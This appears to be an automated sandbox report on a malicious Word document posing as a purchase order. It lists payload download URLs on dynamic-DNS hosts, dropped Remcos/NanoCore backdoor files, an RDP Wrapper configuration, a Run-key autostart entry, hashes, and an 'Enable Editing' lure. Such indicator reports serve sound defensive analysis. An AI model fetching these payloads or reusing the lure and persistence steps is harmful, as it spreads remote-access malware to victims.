        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Program Files\Microsoft DN1\sqlmap.dll20%MetadefenderBrowse
        C:\Program Files\Microsoft DN1\sqlmap.dll43%ReversingLabsWin64.Trojan.RDPWrap
        C:\ProgramData\images.exe28%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe28%ReversingLabs
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Roaming\putty.exe28%ReversingLabs
        C:\Windows\System32\rfxvmt.dll0%MetadefenderBrowse
        C:\Windows\System32\rfxvmt.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        21.2.images.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        15.2.putty.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        34.2.iBCrDCK.i.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
        34.2.iBCrDCK.i.exe.440000.4.unpack100%AviraTR/NanoCore.fadteDownload File
        13.2.putty.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://newhosteeeee.ydns.eu0%Avira URL Cloudsafe
        http://hutyrtit.ydns.eu/microC.exe100%Avira URL Cloudmalware
        httP://newhosteeeee.ydns.eu/putty.exePE0%Avira URL Cloudsafe
        httP://newhosteeeee.ydns.eu/putty.exe0%Avira URL Cloudsafe
        http://ja.com/0%Avira URL Cloudsafe
        http://java.co0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        httP://newhosteeeee.ydns.eu/p0%Avira URL Cloudsafe
        httP://newhosteeeee.ydns.eu/putt0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        newhosteeeee.ydns.eu
        		203.159.80.186
        		truefalse
          		high
          sdafsdffssffs.ydns.eu
          		203.159.80.186
          		truefalse
            		high
            hutyrtit.ydns.eu
            		203.159.80.165
            		truefalse
              		high
              hhjhtggfr.duckdns.org
              		203.159.80.186
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://hutyrtit.ydns.eu/microC.exetrue
                • Avira URL Cloud: malware
                		unknown
                http://newhosteeeee.ydns.eu/putty.exetrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checknotepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                    		high
                    http://www.icra.org/vocabulary/.notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpfalse
                      		high
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                        		high
                        http://newhosteeeee.ydns.eupowershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.piriform.com/ccleaner.powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmpfalse
                          		high
                          httP://newhosteeeee.ydns.eu/putty.exePEpowershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          httP://newhosteeeee.ydns.eu/putty.exepowershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://ja.com/powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://java.copowershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.piriform.com/ccleanerpowershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                            		high
                            http://www.%s.comPApowershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		low
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truenotepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/syohex/java-simple-mine-sweeperC:putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpfalse
                              		high
                              httP://newhosteeeee.ydns.eu/ppowershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/syohex/java-simple-mine-sweeperputty.exe, images.exefalse
                                		high
                                httP://newhosteeeee.ydns.eu/puttpowershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                203.159.80.186
                                		newhosteeeee.ydns.euNetherlands
                                		47987LOVESERVERSGBfalse
                                203.159.80.165
                                		hutyrtit.ydns.euNetherlands
                                		47987LOVESERVERSGBfalse

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:457815
                                Start date:02.08.2021
                                Start time:10:59:02
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:NEW PO1100372954 -.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:33
                                Number of new started drivers analysed:4
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 50.5% (good quality ratio 49.5%)
                                • Quality average: 87.6%
                                • Quality standard deviation: 20.8%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 336
                                • Number of non-executed functions: 226
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/457815/sample/NEW PO1100372954 -.doc

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:59:41API Interceptor69x Sleep call for process: powershell.exe modified
                                10:59:50API Interceptor19x Sleep call for process: putty.exe modified
                                10:59:59API Interceptor1204x Sleep call for process: images.exe modified
                                11:00:13API Interceptor709x Sleep call for process: cmd.exe modified
                                11:00:16API Interceptor983x Sleep call for process: iBCrDCK.i.exe modified
                                11:00:23API Interceptor37x Sleep call for process: drvinst.exe modified
                                11:00:39AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                11:00:49API Interceptor140x Sleep call for process: smtpsvc.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Program Files\Microsoft DN1\rdpwrap.ini
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):181846
                                Entropy (8bit):5.421809355655133
                                Encrypted:false
                                SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                                MD5:6BC395161B04AA555D5A4E8EB8320020
                                SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                                SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                                SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                                Malicious:false
                                Reputation:unknown
                                Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                C:\Program Files\Microsoft DN1\sqlmap.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):116736
                                Entropy (8bit):5.884975745255681
                                Encrypted:false
                                SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                MD5:461ADE40B800AE80A40985594E1AC236
                                SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 20%, Browse
                                • Antivirus: ReversingLabs, Detection: 43%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                C:\ProgramData\images.exe
                                Process:C:\Users\user\AppData\Roaming\putty.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_11.00.14
                                Process:C:\ProgramData\images.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.2566267151938755
                                Encrypted:false
                                SSDEEP:3:ilsVeJ7lfo0eF2PNylRflyQHAnyWdl+SliXln:ilKSNombQgyWn+Sk1
                                MD5:9DD34F139B8B7D0FC865CDE6027043FB
                                SHA1:F9098E55DD0B2F83C8C58E117804F12DCAEA8D93
                                SHA-256:96BE75D129E470DEEBADA5AD99013E91F0454306B24650A6BC043C1B22A40D46
                                SHA-512:7031A0A6EE90FB6C9725232BEF9EE93574E8DC6A77B0DECBC3EF2B7FBB23966E5F3C0BCF1AD30C1892B9E8437377A893201B8E10B94763EB34477D13BAD2A121
                                Malicious:false
                                Reputation:unknown
                                Preview: ..{.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                IE Cache URL:http://hutyrtit.ydns.eu/microC.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                IE Cache URL:http://newhosteeeee.ydns.eu/putty.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11DB366A.png
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9029FF63.wmf
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
                                Category:dropped
                                Size (bytes):3730
                                Entropy (8bit):5.027033050759854
                                Encrypted:false
                                SSDEEP:48:5Wik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fo:Jk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DA
                                MD5:5648227A1DC795BD5B4961DAD493E795
                                SHA1:1611B47CE3F0AD0D19EEE0E27AB2CF3A8190B0D7
                                SHA-256:200124261ED676F6C2D812191655E2EC735897137E93ED676BD22AD6E455FC7A
                                SHA-512:3714019501B872EC8D514909F21108611A79C65C204C8251F01338CDDF76CB32BFDB2BB1CF3545E0A1D1D88549954F5F7999B9EE05A053FF73E323560B4FFB14
                                Malicious:false
                                Reputation:unknown
                                Preview: ..................................5...........................Segoe UI....C......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2631CAF7-C3D4-4848-8C82-E142953DDA5E}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):44618
                                Entropy (8bit):2.916482234929812
                                Encrypted:false
                                SSDEEP:768:Dr/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:nFia0Dqeb0nstw29rVzWSgm58F
                                MD5:CFD90F1E4A07FBF4850CB646C76C0AC9
                                SHA1:E9692ED21B6AFE1B5D587ECA5A20330676ED3325
                                SHA-256:0989F417091A5262338DEACB63FA9D9129741D9C862B67E6F8060DB43E67BAAE
                                SHA-512:53383F93D07DDE48873F5CA2069F1F653723B20BC7BC51C78530B628764243C2622E54C0545D83D14AEAC0521F018EBE490A20F1DB63446EA70943871A541A86
                                Malicious:false
                                Reputation:unknown
                                Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.d.g.h.g.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.N.d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.3573187972516119
                                Encrypted:false
                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb3:IiiiiiiiiifdLloZQc8++lsJe1MzK/
                                MD5:CD4DCADB7EAF8EBC3C0D123D947A31DC
                                SHA1:37AFAD9A59B5EF6715E976B43C141DA08A1758A5
                                SHA-256:0AA54F5023AB6361CC2ACD4C28F082149BA87BDC042BA7374CD02AFCAA01B5F1
                                SHA-512:30B40C28DCDED02E8FFCE1BF40777B76D904C1EC1D2D5DFD3E18BB3B783E6CD8B6AD76D9733ACF32E2FD01140AF54FF134FBE10F5615407E8B078BAC093E82CB
                                Malicious:false
                                Reputation:unknown
                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:unknown
                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
